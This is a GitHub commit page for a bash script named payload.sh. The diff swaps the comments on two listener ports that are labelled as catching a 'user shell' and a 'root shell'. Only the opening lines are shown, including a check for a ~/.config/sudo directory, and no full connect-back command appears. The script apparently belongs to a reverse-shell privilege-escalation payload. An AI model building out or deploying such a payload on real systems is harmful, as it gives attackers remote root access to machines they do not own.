Update payload.sh

pull/416/head
Darkprince 2024-07-01 10:36:07 +05:30 committed by GitHub
parent db2345c35b
commit 94c3342302
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 2 deletions

View File

@ -1,8 +1,8 @@
#!/bin/bash #!/bin/bash
LISTENER_IP="127.0.0.1" LISTENER_IP="127.0.0.1"
LISTENER1_PORT="1337" #Listener for user shell LISTENER1_PORT="1337" #Listener for root shell
LISTENER2_PORT="4444" #Listener for root shell LISTENER2_PORT="4444" #Listener for user shell
if [ ! -d ~/.config/sudo ] if [ ! -d ~/.config/sudo ]
then then